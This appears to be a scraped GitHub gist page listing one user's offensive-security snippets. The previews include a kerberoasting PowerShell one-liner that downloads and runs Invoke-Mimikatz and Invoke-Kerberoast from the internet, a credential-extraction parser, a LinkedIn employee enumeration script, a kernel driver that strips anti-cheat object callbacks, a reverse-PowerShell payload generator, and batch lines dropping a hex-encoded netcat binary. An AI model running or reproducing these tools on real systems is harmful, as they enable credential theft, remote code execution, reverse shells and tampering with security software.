I hereby claim:
- I am olivierlaflamme on github.
- I am olivierlaflamme (https://keybase.io/olivierlaflamme) on keybase.
- I have a public key ASCgiB3TsMKpS01EJ4ltypEUa8ZPzeCtdkxUIDweIzFfNgo
To claim this, I am signing this object:
Boschko OlivierLaflamme
OlivierLaflamme
/ VIRUS.html
Last active
April 26, 2023 04:32
My first "Virus Script" be careful, once open you will loose all access to your browser or so I think im fairly new to this...
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <!-- | |
| Programme Conceived BY: Olivier Laflamme | |
| 2017 About, Inc - All Rights Reserved. | |
| --> | |
| <html> | |
| <head> | |
| <title>Virus</title> |
OlivierLaflamme
/ keybase.md
Created
January 14, 2020 16:11
OlivierLaflamme
/ ssh_tunneling
Created
January 14, 2020 16:42
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ssh -L {LOCAL_PORT}:{HOST}:{REMOTE_PORT} {REMOTE_HOST} | |
| Example | |
| ###ssh -L 3001:localhost:3001 username@host |
OlivierLaflamme
/ pipykatz-creds-extract.py
Created
March 16, 2020 13:59
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import json | |
| filenames = [] | |
| def findcred(dictionary): | |
| for k, v in dictionary.items(): | |
| if k == 'password' and dictionary['password']: | |
| result = {} | |
| if 'domainname' in dictionary: | |
| result['domainname'] = dictionary['domainname'] |
OlivierLaflamme
/ kerberoasting.ps1
Created
March 16, 2020 14:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Invoke-Mimikatz.ps1 | |
| $urls = @("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; $domain=((Get-WmiObject Win32_ComputerSystem).Domain); Add-Type -AssemblyName System.IdentityModel; iex $("setspn.exe -T $domain -Q */*") | Select-String '^CN' -Context 0,1 |% {New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim()}; Invoke-Mimikatz -Command "`"kerberos::list /export`"" | |
| # Invoke-Kerberoast.ps1 | |
| $urls = @("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1","https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1"); $urls |% {iex (New-Object System.Net.WebClient).DownloadString($_);}; gci function:\ | Select-String "Invoke-"; Invoke-Kerberoast | |
| # Invoke-Kerberoast.ps1 - Fix ':$ |
OlivierLaflamme
/ linkededIN_enum
Created
March 23, 2020 13:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (function () { | |
| var emps = []; | |
| var s = new Set(); | |
| document.querySelectorAll('.actor-name').forEach( e=> { | |
| s.add(e.innerText) | |
| }); | |
| s.forEach(users => { | |
| const fullname = users.split(",")[0].toLowerCase().normalize('NFD').replace(/[\u0300-\u036f]/g, ""); | |
| const names = fullname.split(" "); | |
| const first = names[0]; |
OlivierLaflamme
/ Driver_to_disable_BE_process_thread_object_callbacks
Created
June 22, 2020 18:10
Basically, this dynamically gets the offset to the CallbackList in the OBJECT_TYPE structure (in a really shitty, long-winded way - pls improve) so this will work on any Windows version 7+. The other structures which I've labeled CALLBACK_ENTRY and CALLBACK_ENTRY_ITEM that are completely undocumented have not changed from Windows 7 to Windows 10…
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <ntifs.h> | |
| #include <windef.h> | |
| // Pre-Processor definitions for our I/O control codes. | |
| #define REMOVE_BEOBJECT_CALLBACKS_IOCTL CTL_CODE(FILE_DEVICE_KS, 0x806, METHOD_BUFFERED, FILE_READ_DATA | FILE_WRITE_DATA) | |
| #define RESTORE_BEOBJECT_CALLBACKS_IOCTL CTL_CODE(FILE_DEVICE_KS, 0x807, METHOD_BUFFERED, FILE_READ_DATA | FILE_WRITE_DATA) | |
| // Global variable to our device. | |
| PDEVICE_OBJECT deviceObj = NULL; | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _GNU_SOURCE | |
| #include <sched.h> | |
| #include <unistd.h> | |
| #include <stdlib.h> | |
| #include <sys/wait.h> | |
| #include <signal.h> | |
| #include <fcntl.h> | |
| #include <stdio.h> | |
| #include <string.h> | |
| #include <limits.h> |
OlivierLaflamme
/ mkpsrevshell.py
Created
August 19, 2020 21:19
— forked from tothi/mkpsrevshell.py
reverse PowerShell cmdline payload generator (base64 encoded)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # | |
| # generate reverse powershell cmdline with base64 encoded args | |
| # | |
| import sys | |
| import base64 | |
| def help(): | |
| print("USAGE: %s IP PORT" % sys.argv[0]) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo|set /p="">nc.hex | |
| echo|set /p="4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000">>nc.hex | |
| echo|set /p="504500004c010300b98eae340000000000000000e0000f010b010500007000000010000000d00000704c010000e000000050010000004000001000000002000004000000000000000400000000000000006001000010000000000000030000000000100000100000000010000010000000000000100000000000000000000000">>nc.hex | |
| echo|set /p="00500100b0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005550583000000000">>nc.hex | |
| echo|set /p="00d00000001000000000000000020000000000000000000000000000800000e055505831000000000070000000e000000070000000020000000000000000000000000000400000e05550 |
OlderNewer